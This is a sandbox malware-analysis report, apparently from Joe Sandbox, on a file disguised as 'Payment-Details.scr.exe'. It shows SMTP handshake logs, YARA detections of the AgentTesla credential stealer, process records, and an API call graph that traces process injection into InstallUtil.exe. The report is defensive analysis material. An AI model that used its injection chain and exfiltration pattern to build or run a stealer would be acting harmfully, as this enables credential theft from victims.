                                      Aug 20, 2024 18:40:15.476021051 CEST58762404163.44.198.71192.168.2.8220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Tue, 20 Aug 2024 23:40:14 +0700
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Aug 20, 2024 18:40:15.826273918 CEST58762404163.44.198.71192.168.2.8250-cpanel16wh.bkk1.cloud.z.com Hello 468325 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-PIPECONNECT
                                      250-STARTTLS
                                      250 HELP
                                      Aug 20, 2024 18:40:15.826791048 CEST62404587192.168.2.8163.44.198.71STARTTLS
                                      Aug 20, 2024 18:40:16.180588007 CEST58762404163.44.198.71192.168.2.8220 TLS go ahead
                                      Aug 20, 2024 18:40:23.490655899 CEST58762406163.44.198.71192.168.2.8220-cpanel16wh.bkk1.cloud.z.com ESMTP Exim 4.96.2 #2 Tue, 20 Aug 2024 23:40:23 +0700
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Aug 20, 2024 18:40:23.492147923 CEST62406587192.168.2.8163.44.198.71EHLO 468325
                                      Aug 20, 2024 18:40:23.842611074 CEST58762406163.44.198.71192.168.2.8250-cpanel16wh.bkk1.cloud.z.com Hello 468325 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-PIPECONNECT
                                      250-STARTTLS
                                      250 HELP
                                      Aug 20, 2024 18:40:23.842791080 CEST62406587192.168.2.8163.44.198.71STARTTLS
                                      Aug 20, 2024 18:40:24.201710939 CEST58762406163.44.198.71192.168.2.8220 TLS go ahead

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:12:39:12
                                      Start date:20/08/2024
                                      Path:C:\Users\user\Desktop\Payment-Details.scr.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Payment-Details.scr.exe"
                                      Imagebase:0xf80000
                                      File size:132'608 bytes
                                      MD5 hash:EEE76D74368111C385E634A9F4F5A9CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1692829091.0000000007160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1676003919.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:12:39:37
                                      Start date:20/08/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0x10000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2016324901.00000000023AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2016324901.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:12:39:46
                                      Start date:20/08/2024
                                      Path:C:\Users\user\AppData\Roaming\Fdimzk.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Fdimzk.exe"
                                      Imagebase:0x370000
                                      File size:132'608 bytes
                                      MD5 hash:EEE76D74368111C385E634A9F4F5A9CF
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2013699239.000000000273C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 18%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:12:39:55
                                      Start date:20/08/2024
                                      Path:C:\Users\user\AppData\Roaming\Fdimzk.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Fdimzk.exe"
                                      Imagebase:0xa70000
                                      File size:132'608 bytes
                                      MD5 hash:EEE76D74368111C385E634A9F4F5A9CF
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:12:40:10
                                      Start date:20/08/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0xb00000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2101369596.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2101369596.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2101369596.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2101369596.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:12:40:19
                                      Start date:20/08/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0x9e0000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2700908180.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2700908180.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2700908180.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:13.2%
                                        Dynamic/Decrypted Code Coverage:98.1%
                                        Signature Coverage:11.7%
                                        Total number of Nodes:377
                                        Total number of Limit Nodes:19
                                        execution_graph 53117 7257007 53118 7257011 53117->53118 53123 63666a1 53118->53123 53130 63666e8 53118->53130 53136 63666f8 53118->53136 53119 7256ae9 53124 6366718 53123->53124 53126 63666aa 53123->53126 53142 6366822 53124->53142 53146 6366728 53124->53146 53150 6366738 53124->53150 53125 6366723 53125->53119 53126->53119 53131 63666f8 53130->53131 53133 6366822 6 API calls 53131->53133 53134 6366738 6 API calls 53131->53134 53135 6366728 6 API calls 53131->53135 53132 6366723 53132->53119 53133->53132 53134->53132 53135->53132 53137 636670d 53136->53137 53139 6366822 6 API calls 53137->53139 53140 6366738 6 API calls 53137->53140 53141 6366728 6 API calls 53137->53141 53138 6366723 53138->53119 53139->53138 53140->53138 53141->53138 53143 636678d 53142->53143 53144 636679c 53143->53144 53154 6366bfa 53143->53154 53144->53125 53148 6366738 53146->53148 53147 636679c 53147->53125 53148->53147 53149 6366bfa 6 API calls 53148->53149 53149->53148 53151 6366762 53150->53151 53152 636679c 53151->53152 53153 6366bfa 6 API calls 53151->53153 53152->53125 53153->53151 53155 6366c03 53154->53155 53156 6366c36 53154->53156 53155->53156 53161 63675a4 53155->53161 53166 6367829 53155->53166 53171 63671c1 53155->53171 53176 6366d93 53155->53176 53156->53143 53162 63675af 53161->53162 53181 636426c 53162->53181 53185 6364278 53162->53185 53167 6367838 53166->53167 53189 63634f0 53167->53189 53193 63634e8 53167->53193 53168 6367887 53172 63671ca 53171->53172 53197 6367ce8 53172->53197 53202 6367cd8 53172->53202 53173 63671e3 53177 6366da7 53176->53177 53179 63634f0 VirtualProtect 53177->53179 53180 63634e8 VirtualProtect 53177->53180 53178 6366d4e 53179->53178 53180->53178 53182 6364278 CreateFileMappingA 53181->53182 53184 6364371 53182->53184 53186 63642cd CreateFileMappingA 53185->53186 53188 6364371 53186->53188 53190 6363538 VirtualProtect 53189->53190 53192 6363573 53190->53192 53192->53168 53194 63634f0 VirtualProtect 53193->53194 53196 6363573 53194->53196 53196->53168 53198 6367cfd 53197->53198 53207 6364440 53198->53207 53211 6364438 53198->53211 53199 6367d1f 53199->53173 53203 6367cdb 53202->53203 53205 6364440 MapViewOfFile 53203->53205 53206 6364438 MapViewOfFile 53203->53206 53204 6367d1f 53204->53173 53205->53204 53206->53204 53208 6364480 MapViewOfFile 53207->53208 53210 63644bd 53208->53210 53210->53199 53212 6364440 MapViewOfFile 53211->53212 53214 63644bd 53212->53214 53214->53199 53215 72ce0e8 53216 72ce110 53215->53216 53219 72ce5a8 53216->53219 53217 72ce137 53220 72ce5d5 53219->53220 53221 72cd630 VirtualProtect 53220->53221 53223 72ce76b 53220->53223 53222 72ce75c 53221->53222 53222->53217 53223->53217 53224 72ceaf8 53225 72ceb38 VirtualAlloc 53224->53225 53227 72ceb72 53225->53227 52781 72570bd 52782 72570c7 52781->52782 52786 636edf0 52782->52786 52790 636ede1 52782->52790 52783 7257105 52787 636ee05 52786->52787 52788 636ee1b 52787->52788 52794 636f141 52787->52794 52788->52783 52791 636edf0 52790->52791 52792 636ee1b 52791->52792 52793 636f141 11 API calls 52791->52793 52792->52783 52793->52792 52795 636f14b 52794->52795 52798 752fe28 52795->52798 52799 752fe3d 52798->52799 52810 66f019d 52799->52810 52814 66f0140 52799->52814 52818 66f00c0 52799->52818 52822 66f0040 52799->52822 52826 66f01d4 52799->52826 52830 66f0464 52799->52830 52834 66f0006 52799->52834 52838 66f024b 52799->52838 52842 66f04cc 52799->52842 52800 636ee8d 52800->52788 52812 66f00a5 52810->52812 52811 66f01cb 52811->52800 52812->52811 52846 66f0709 52812->52846 52816 66f00a5 52814->52816 52815 66f01cb 52815->52800 52816->52815 52817 66f0709 11 API calls 52816->52817 52817->52816 52820 66f00a5 52818->52820 52819 66f01cb 52819->52800 52820->52819 52821 66f0709 11 API calls 52820->52821 52821->52820 52823 66f006d 52822->52823 52824 66f01cb 52823->52824 52825 66f0709 11 API calls 52823->52825 52824->52800 52825->52823 52828 66f00a5 52826->52828 52827 66f01cb 52827->52800 52828->52827 52829 66f0709 11 API calls 52828->52829 52829->52828 52832 66f00a5 52830->52832 52831 66f01cb 52831->52800 52832->52831 52833 66f0709 11 API calls 52832->52833 52833->52832 52835 66f0040 52834->52835 52836 66f01cb 52835->52836 52837 66f0709 11 API calls 52835->52837 52836->52800 52837->52835 52840 66f00a5 52838->52840 52839 66f01cb 52839->52800 52840->52839 52841 66f0709 11 API calls 52840->52841 52841->52840 52844 66f00a5 52842->52844 52843 66f01cb 52843->52800 52844->52843 52845 66f0709 11 API calls 52844->52845 52845->52844 52847 66f072d 52846->52847 52859 66f0c0d 52847->52859 52864 66f12d1 52847->52864 52869 66f0ff1 52847->52869 52874 66f0872 52847->52874 52879 66f0e44 52847->52879 52884 66f0b06 52847->52884 52888 66f13b8 52847->52888 52893 66f0d8a 52847->52893 52897 66f0c7a 52847->52897 52902 66f10cd 52847->52902 52848 66f074f 52848->52812 52860 66f10f3 52859->52860 52861 66f085a 52859->52861 52907 66f34c0 52860->52907 52912 66f34b0 52860->52912 52865 66f12ee 52864->52865 52925 6363100 52865->52925 52929 63630f8 52865->52929 52866 66f1339 52866->52848 52870 66f100e 52869->52870 52872 6363100 WriteProcessMemory 52870->52872 52873 63630f8 WriteProcessMemory 52870->52873 52871 66f104e 52872->52871 52873->52871 52875 66f087c 52874->52875 52933 63632b0 52875->52933 52937 63632a8 52875->52937 52876 66f085a 52880 66f0898 52879->52880 52881 66f085a 52879->52881 52882 63632b0 NtResumeThread 52880->52882 52883 63632a8 NtResumeThread 52880->52883 52882->52881 52883->52881 52941 66f3419 52884->52941 52946 66f3428 52884->52946 52885 66f0b1e 52889 66f13d0 52888->52889 52891 6363100 WriteProcessMemory 52889->52891 52892 63630f8 WriteProcessMemory 52889->52892 52890 66f13fd 52890->52848 52891->52890 52892->52890 52895 6362be0 Wow64SetThreadContext 52893->52895 52896 6362bd8 Wow64SetThreadContext 52893->52896 52894 66f085a 52895->52894 52896->52894 52898 66f0c92 52897->52898 52959 66f1d78 52898->52959 52972 66f1d88 52898->52972 52903 66f10d7 52902->52903 52905 66f34c0 2 API calls 52903->52905 52906 66f34b0 2 API calls 52903->52906 52904 66f085a 52905->52904 52906->52904 52908 66f34d5 52907->52908 52917 6363000 52908->52917 52921 6362ff8 52908->52921 52909 66f34f7 52909->52861 52913 66f34c0 52912->52913 52915 6363000 VirtualAllocEx 52913->52915 52916 6362ff8 VirtualAllocEx 52913->52916 52914 66f34f7 52914->52861 52915->52914 52916->52914 52918 6363040 VirtualAllocEx 52917->52918 52920 636307d 52918->52920 52920->52909 52922 6363040 VirtualAllocEx 52921->52922 52924 636307d 52922->52924 52924->52909 52926 6363148 WriteProcessMemory 52925->52926 52928 636319f 52926->52928 52928->52866 52930 6363100 WriteProcessMemory 52929->52930 52932 636319f 52930->52932 52932->52866 52934 63632f8 NtResumeThread 52933->52934 52936 636332d 52934->52936 52936->52876 52938 63632b1 NtResumeThread 52937->52938 52940 636332d 52938->52940 52940->52876 52942 66f3428 52941->52942 52951 6362be0 52942->52951 52955 6362bd8 52942->52955 52943 66f3456 52943->52885 52947 66f343d 52946->52947 52949 6362be0 Wow64SetThreadContext 52947->52949 52950 6362bd8 Wow64SetThreadContext 52947->52950 52948 66f3456 52948->52885 52949->52948 52950->52948 52952 6362c25 Wow64SetThreadContext 52951->52952 52954 6362c6d 52952->52954 52954->52943 52956 6362be0 Wow64SetThreadContext 52955->52956 52958 6362c6d 52956->52958 52958->52943 52960 66f1d88 52959->52960 52985 66f1e9a 52960->52985 52990 66f2380 52960->52990 52995 66f22b1 52960->52995 53000 66f2444 52960->53000 53005 66f1f75 52960->53005 53010 66f2507 52960->53010 53015 66f2118 52960->53015 53020 66f1df8 52960->53020 53025 66f1de8 52960->53025 53030 66f20c9 52960->53030 52973 66f1d9f 52972->52973 52975 66f1e9a 3 API calls 52973->52975 52976 66f20c9 3 API calls 52973->52976 52977 66f1de8 3 API calls 52973->52977 52978 66f1df8 3 API calls 52973->52978 52979 66f2118 3 API calls 52973->52979 52980 66f2507 3 API calls 52973->52980 52981 66f1f75 3 API calls 52973->52981 52982 66f2444 3 API calls 52973->52982 52983 66f22b1 3 API calls 52973->52983 52984 66f2380 3 API calls 52973->52984 52974 66f085a 52975->52974 52976->52974 52977->52974 52978->52974 52979->52974 52980->52974 52981->52974 52982->52974 52983->52974 52984->52974 52986 66f1e85 52985->52986 52986->52985 53035 63628d4 52986->53035 53039 6362891 52986->53039 53044 63628e0 52986->53044 52991 66f1e85 52990->52991 52992 63628d4 CreateProcessA 52991->52992 52993 63628e0 CreateProcessA 52991->52993 52994 6362891 CreateProcessA 52991->52994 52992->52991 52993->52991 52994->52991 52996 66f1e85 52995->52996 52997 63628d4 CreateProcessA 52996->52997 52998 63628e0 CreateProcessA 52996->52998 52999 6362891 CreateProcessA 52996->52999 52997->52996 52998->52996 52999->52996 53001 66f1e85 53000->53001 53002 63628d4 CreateProcessA 53001->53002 53003 63628e0 CreateProcessA 53001->53003 53004 6362891 CreateProcessA 53001->53004 53002->53001 53003->53001 53004->53001 53006 66f1e85 53005->53006 53007 63628d4 CreateProcessA 53006->53007 53008 63628e0 CreateProcessA 53006->53008 53009 6362891 CreateProcessA 53006->53009 53007->53006 53008->53006 53009->53006 53011 66f1e85 53010->53011 53012 63628d4 CreateProcessA 53011->53012 53013 63628e0 CreateProcessA 53011->53013 53014 6362891 CreateProcessA 53011->53014 53012->53011 53013->53011 53014->53011 53016 66f1e85 53015->53016 53017 63628d4 CreateProcessA 53016->53017 53018 63628e0 CreateProcessA 53016->53018 53019 6362891 CreateProcessA 53016->53019 53017->53016 53018->53016 53019->53016 53021 66f1e2b 53020->53021 53022 63628d4 CreateProcessA 53021->53022 53023 63628e0 CreateProcessA 53021->53023 53024 6362891 CreateProcessA 53021->53024 53022->53021 53023->53021 53024->53021 53026 66f1df8 53025->53026 53027 63628d4 CreateProcessA 53026->53027 53028 63628e0 CreateProcessA 53026->53028 53029 6362891 CreateProcessA 53026->53029 53027->53026 53028->53026 53029->53026 53031 66f1e85 53030->53031 53032 63628d4 CreateProcessA 53031->53032 53033 63628e0 CreateProcessA 53031->53033 53034 6362891 CreateProcessA 53031->53034 53032->53031 53033->53031 53034->53031 53036 63628e0 CreateProcessA 53035->53036 53038 6362acc 53036->53038 53040 636289a 53039->53040 53041 63628f1 CreateProcessA 53039->53041 53040->52986 53043 6362acc 53041->53043 53045 63628f1 CreateProcessA 53044->53045 53047 6362acc 53045->53047 53228 72573fe 53229 7257408 53228->53229 53234 6364d80 53229->53234 53238 6364d70 53229->53238 53242 6364d29 53229->53242 53230 7257446 53235 6364d95 53234->53235 53236 6364dab 53235->53236 53247 6364e74 53235->53247 53236->53230 53239 6364d80 53238->53239 53240 6364dab 53239->53240 53241 6364e74 2 API calls 53239->53241 53240->53230 53241->53240 53243 6364d91 53242->53243 53245 6364d32 53242->53245 53246 6364e74 2 API calls 53243->53246 53244 6364dab 53244->53230 53245->53230 53246->53244 53248 6364e9d 53247->53248 53249 6365205 53248->53249 53250 63634f0 VirtualProtect 53248->53250 53251 63634e8 VirtualProtect 53248->53251 53249->53236 53250->53248 53251->53248 52752 63621b8 52753 6362206 NtProtectVirtualMemory 52752->52753 52755 6362250 52753->52755 52756 72574aa 52757 72574b4 52756->52757 52761 6365a38 52757->52761 52766 6365a28 52757->52766 52758 72574f2 52762 6365a4d 52761->52762 52771 6365a78 52762->52771 52776 6365a69 52762->52776 52763 6365a63 52763->52758 52767 6365a38 52766->52767 52769 6365a78 2 API calls 52767->52769 52770 6365a69 2 API calls 52767->52770 52768 6365a63 52768->52758 52769->52768 52770->52768 52773 6365aa5 52771->52773 52772 6365b01 52772->52763 52773->52772 52774 63634f0 VirtualProtect 52773->52774 52775 63634e8 VirtualProtect 52773->52775 52774->52773 52775->52773 52777 6365a72 52776->52777 52778 6365b01 52777->52778 52779 63634f0 VirtualProtect 52777->52779 52780 63634e8 VirtualProtect 52777->52780 52778->52763 52779->52777 52780->52777 53048 19fb900 53049 19fb91a 53048->53049 53050 19fb92a 53049->53050 53053 72c2001 53049->53053 53057 72c1942 53049->53057 53054 72c2020 53053->53054 53061 72cd630 53054->53061 53058 72c1948 53057->53058 53060 72cd630 VirtualProtect 53058->53060 53059 72c1963 53059->53050 53060->53059 53063 72cd657 53061->53063 53065 72cda80 53063->53065 53066 72cdac8 VirtualProtect 53065->53066 53068 72c2047 53066->53068 53069 7256eba 53070 7256ec0 53069->53070 53074 636e568 53070->53074 53079 636e558 53070->53079 53071 7256ae9 53075 636e57d 53074->53075 53084 636e5a8 53075->53084 53090 636e598 53075->53090 53076 636e593 53076->53071 53080 636e568 53079->53080 53082 636e5a8 4 API calls 53080->53082 53083 636e598 4 API calls 53080->53083 53081 636e593 53081->53071 53082->53081 53083->53081 53086 636e5d2 53084->53086 53085 636e62a 53085->53076 53086->53085 53096 636eb20 53086->53096 53101 6364540 53086->53101 53105 6364538 53086->53105 53092 636e5a8 53090->53092 53091 636e62a 53091->53076 53092->53091 53093 6364540 DuplicateHandle 53092->53093 53094 6364538 DuplicateHandle 53092->53094 53095 636eb20 2 API calls 53092->53095 53093->53092 53094->53092 53095->53092 53097 636eb45 53096->53097 53109 63640a4 53097->53109 53113 63640b0 53097->53113 53102 6364588 DuplicateHandle 53101->53102 53104 63645db 53102->53104 53104->53086 53106 6364540 DuplicateHandle 53105->53106 53108 63645db 53106->53108 53108->53086 53110 63640b0 CreateFileA 53109->53110 53112 63641ab 53110->53112 53114 6364102 CreateFileA 53113->53114 53116 63641ab 53114->53116

                                        Executed Functions

                                        Function 0725BF60 Relevance: 2.4, Strings: 1, Instructions: 1180COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        • Opcode ID: 1ea3c6783342c95ffd835a3df7d851b3119062562217e1e664ec74943778f26c
                                        • Instruction ID: e675b314615e334a7104ead17ffe64f01595acb6fdef1134539abb81f0022d6d
                                        • Opcode Fuzzy Hash: 1ea3c6783342c95ffd835a3df7d851b3119062562217e1e664ec74943778f26c
                                        • Instruction Fuzzy Hash: 2FB209B4A1021ADFDB14CFA4C894BADB7B6FB88700F158195E905AB3A5DB74DC81CF60
                                        Function 070E0040 Relevance: 2.3, Strings: 1, Instructions: 1081COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 367 70e0040-70e006e 368 70e0075-70e0181 367->368 369 70e0070 367->369 372 70e01a5-70e01b1 368->372 373 70e0183-70e019f call 70e2250 368->373 369->368 374 70e01b8-70e01bd 372->374 375 70e01b3 372->375 373->372 376 70e01bf-70e01cb 374->376 377 70e01f5-70e0215 374->377 375->374 379 70e01cd 376->379 380 70e01d2-70e01f0 376->380 385 70e021c-70e0445 377->385 386 70e0217 377->386 379->380 381 70e1419-70e141f 380->381 383 70e1429 381->383 384 70e1421 381->384 387 70e142a 383->387 384->383 407 70e0ab2-70e0abe 385->407 386->385 387->387 408 70e044a-70e0456 407->408 409 70e0ac4-70e0afc 407->409 410 70e045d-70e051a 408->410 411 70e0458 408->411 417 70e0bd6-70e0bdc 409->417 428 70e051c-70e0535 410->428 429 70e053b-70e058d 410->429 411->410 419 70e0be2-70e0c1a 417->419 420 70e0b01-70e0b7e 417->420 432 70e0f64-70e0f6a 419->432 438 70e0b80-70e0b84 420->438 439 70e0bb1-70e0bd3 420->439 428->429 451 70e058f-70e0597 429->451 452 70e059c-70e05e9 429->452 435 70e0c1f-70e0e21 432->435 436 70e0f70-70e0fb8 432->436 531 70e0eac-70e0eb0 435->531 532 70e0e27-70e0ea7 435->532 445 70e0fba-70e102d 436->445 446 70e1033-70e107e 436->446 438->439 441 70e0b86-70e0bae 438->441 439->417 441->439 445->446 469 70e13e3-70e13e9 446->469 454 70e0aa3-70e0aaf 451->454 466 70e05eb-70e05f3 452->466 467 70e05f8-70e0645 452->467 454->407 466->454 483 70e0647-70e064f 467->483 484 70e0654-70e06a1 467->484 471 70e13ef-70e1417 469->471 472 70e1083-70e10dc 469->472 471->381 486 70e10de-70e10f9 472->486 487 70e1104-70e1110 472->487 483->454 512 70e06a3-70e06ab 484->512 513 70e06b0-70e06fd 484->513 486->487 489 70e1117-70e1123 487->489 490 70e1112 487->490 493 70e1136-70e1145 489->493 494 70e1125-70e1131 489->494 490->489 495 70e114e-70e13ab 493->495 496 70e1147 493->496 498 70e13ca-70e13e0 494->498 526 70e13b6-70e13c2 495->526 496->495 499 70e125b-70e129b 496->499 500 70e1216-70e1256 496->500 501 70e1154-70e11bd 496->501 502 70e11c2-70e1211 496->502 503 70e12a0-70e1308 496->503 498->469 499->526 500->526 501->526 502->526 533 70e137c-70e1382 503->533 512->454 540 70e06ff-70e0707 513->540 541 70e070c-70e0759 513->541 526->498 534 70e0f0d-70e0f4a 531->534 535 70e0eb2-70e0f0b 531->535 550 70e0f4b-70e0f61 532->550 536 70e130a-70e1368 533->536 537 70e1384-70e138e 533->537 534->550 535->550 552 70e136f-70e1379 536->552 553 70e136a 536->553 537->526 540->454 558 70e075b-70e0763 541->558 559 70e0768-70e07b5 541->559 550->432 552->533 553->552 558->454 563 70e07b7-70e07bf 559->563 564 70e07c4-70e0811 559->564 563->454 568 70e0813-70e081b 564->568 569 70e0820-70e086d 564->569 568->454 573 70e086f-70e0877 569->573 574 70e087c-70e08c9 569->574 573->454 578 70e08cb-70e08d3 574->578 579 70e08d8-70e0925 574->579 578->454 583 70e0927-70e092f 579->583 584 70e0934-70e0981 579->584 583->454 588 70e0983-70e098b 584->588 589 70e0990-70e09dd 584->589 588->454 593 70e09df-70e09e7 589->593 594 70e09ec-70e0a39 589->594 593->454 598 70e0a3b-70e0a43 594->598 599 70e0a45-70e0a92 594->599 598->454 603 70e0a9e-70e0aa0 599->603 604 70e0a94-70e0a9c 599->604 603->454 604->454
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
